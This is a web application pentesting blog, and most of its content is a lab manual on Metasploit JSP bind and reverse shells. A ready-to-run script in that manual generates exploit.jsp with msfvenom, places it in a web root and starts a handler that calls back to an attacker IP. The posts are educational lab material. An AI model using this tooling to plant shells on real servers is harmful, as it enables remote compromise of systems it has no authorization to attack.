WAVSEP – Web Application Vulnerability Scanner Evaluation Project

I have to admit that I really think this is a good idea. Shay Chen (@sectooladdict) has put together a project to evaluate Web Application Vulnerability scanners. He calls it WAVSEP.

The project is currently being hosted on Google code.

Taken from the project description:

Project WAVSEP currently includes the following test cases:

Vulnerabilities:

  • Reflected XSS: 66 test cases, implemented in 64 jsp pages (GET & POST)
  • Error Based SQL Injection: 80 test cases, implemented in 76 jsp pages (GET & POST)
  • Blind SQL Injection: 46 test cases, implemented in 44 jsp pages (GET & POST)
  • Time Based SQL Injection: 10 test cases, implemented in 10 jsp pages (GET & POST)

False Positives:

  • 7 different categories of false positive Reflected XSS vulnerabilities (GET & POST)
  • 10 different categories of false positive SQL Injection vulnerabilities (GET & POST)

Additional Features:

  • A simple web interface for accessing the vulnerable pages
  • Sample detection & exploitation payloads for each and every test case
  • Database connection pool support, ensuring the consistency of scanning results

Also – on Shay’s blog he has posted a comparison of the majority of web application vulnerability scanners (both commercial and open-source).

An argument could be made that the project’s focus in terms of vulnerabilities is too narrow (it does not cover DOM-based XSS, for example), and as much as I can see that argument, I’m sure it is coming from people that are sitting on their ass not doing anything for the community like Shay is doing.

In my opinion, this is good for the community and I hope that the project gains some good momentum and really grows.

Good work Shay!

Posted in Cross Site Scripting, SQL Injection

Cross Site Scripting – So what?

Ok – so I decided to put in a few things about Cross Site Scripting. I wanted to give you enough information to both understand XSS and, more importantly, pull it off against a modern application protected by a Web Application Firewall (WAF).

Let’s start with the absolute basics of XSS:

Ok – that’s the basics of XSS. Now let’s move on to some more technical info about it:

Posted in Cross Site Scripting

Advanced SQL Injection Presentation

I did this talk a few years ago before I started Strategic Security. I love the subject of SQL Injection, I’ve spoken on it a lot and people often ask me for my slides. If you’d like my slides you can download them here.


Hope you enjoy the talk, and feel free to contact me if you have questions on SQL Injection.

Posted in SQL Injection

Metasploit JSP Shells

The Strategic Security rookies are hard at work. This is one of many blog posts that you’ll be seeing from them. I hope you enjoy it, and if you find technical errors in it please let me know so I can get them fixed immediately. If you are interested in becoming a rookie (intern) you can check out the Security Rookies website.

In this lab manual we will be working with the Metasploit JSP bind and reverse shell payloads. The easiest way to use them is to generate a raw .jsp file and place it on a web server that executes JSP (a plain static web server will just serve the file as text, so a servlet container such as Tomcat is needed), though you are not limited to doing it this way. Let’s take a look at how to use them.

First, let’s create our payload and move the resulting exploit.jsp into the document root of the web server:

NOTE:

In a real web application penetration test you would have found a web page that allows you to upload a file and then browse to the file that you uploaded. We are simulating that step by running our own webserver and uploading the exploit.jsp file manually.

Finally, we need to start Metasploit and set up our payload handler (exploit/multi/handler, configured with the same payload, host and port that were used to generate exploit.jsp):

Once everything is set up, request the uploaded exploit.jsp in a browser (or with curl). The server executes the JSP when it is requested: the reverse shell connects back to the handler, and the bind shell starts listening for the handler to connect. Either way, you should see a new session in Metasploit.
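As an added example (this is not code from the original lab manual or from Strategic Security), the script below does the three steps above in one place: it builds the msfvenom command for either the bind or the reverse JSP shell, checks that the port is sane, writes exploit.jsp into the web root, and starts the matching multi/handler. The attacker address 192.168.1.10, target address 192.168.1.20, port 4444, web root /var/www/html and the `go` argument are assumptions for illustration; msfvenom and msfconsole must be on PATH.

```shell
#!/bin/sh
# Added example: stage a Metasploit JSP shell and start its handler.
# Assumed values (not from the original post): attacker host 192.168.1.10,
# target host 192.168.1.20, port 4444, web root /var/www/html.
# Override any of them with environment variables.
MODE="${MODE:-reverse}"              # "reverse" or "bind"
LHOST="${LHOST:-192.168.1.10}"       # attacker IP (reverse mode: where the shell connects back)
RHOST="${RHOST:-192.168.1.20}"       # target IP (bind mode: where the handler connects to)
LPORT="${LPORT:-4444}"               # TCP port used by the shell
WEBROOT="${WEBROOT:-/var/www/html}"  # document root of the JSP-capable server

# Reject anything that is not a TCP port number (1-65535).
valid_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  if [ "$1" -ge 1 ] && [ "$1" -le 65535 ]; then
    return 0
  fi
  return 1
}

# Print the msfvenom command that writes a raw JSP payload to <webroot>/exploit.jsp.
# Usage: venom_cmd <mode> <lhost> <lport> <webroot>
venom_cmd() {
  if [ "$1" = "bind" ]; then
    printf 'msfvenom -p java/jsp_shell_bind_tcp LPORT=%s -f raw -o %s/exploit.jsp' "$3" "$4"
  else
    printf 'msfvenom -p java/jsp_shell_reverse_tcp LHOST=%s LPORT=%s -f raw -o %s/exploit.jsp' "$2" "$3" "$4"
  fi
}

# Print the msfconsole one-liner that starts exploit/multi/handler for the same payload.
# Usage: handler_cmd <mode> <host> <lport>   (host is LHOST for reverse, RHOST for bind)
handler_cmd() {
  if [ "$1" = "bind" ]; then
    printf 'msfconsole -q -x "use exploit/multi/handler; set PAYLOAD java/jsp_shell_bind_tcp; set RHOST %s; set LPORT %s; run"' "$2" "$3"
  else
    printf 'msfconsole -q -x "use exploit/multi/handler; set PAYLOAD java/jsp_shell_reverse_tcp; set LHOST %s; set LPORT %s; run"' "$2" "$3"
  fi
}

# Only act when invoked as "./stage_jsp.sh go"; sourcing the file just defines the functions.
if [ "${1:-}" = "go" ]; then
  valid_port "$LPORT" || { echo "LPORT must be 1-65535, got: $LPORT" >&2; exit 1; }
  eval "$(venom_cmd "$MODE" "$LHOST" "$LPORT" "$WEBROOT")"
  if [ "$MODE" = "bind" ]; then
    # Bind shell: the JSP must be running (listening) before the handler connects to it.
    printf 'Request http://<server>/exploit.jsp now, then press Enter to start the handler: '
    read _
    eval "$(handler_cmd bind "$RHOST" "$LPORT")"
  else
    # Reverse shell: the handler listens first; request the JSP from another terminal.
    echo "Handler starting on $LHOST:$LPORT; request http://<server>/exploit.jsp from another terminal"
    eval "$(handler_cmd reverse "$LHOST" "$LPORT")"
  fi
fi
```

The order of operations is the part people get wrong: for the reverse shell the handler must already be listening when exploit.jsp is requested, while for the bind shell the JSP must already be running (and therefore listening) before the handler tries to connect, which is why the bind branch waits for you before starting msfconsole.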

Posted in File Handling Vulnerabilities

Welcome to Web App Pentest

I really hope that people will enjoy and learn from this website. For me, as a network penetration tester for several years, it was REALLY hard to transition to doing web application penetration tests. I really didn’t have a strong programming background, and the web just didn’t seem as logical to me as the network did.

In time I started to get a feel for it, and along the way I learned some tricks to make it simpler for me. I’ll be trying to share those, as well as new stuff, here on this website.

Let’s do this!!!


Posted in Uncategorized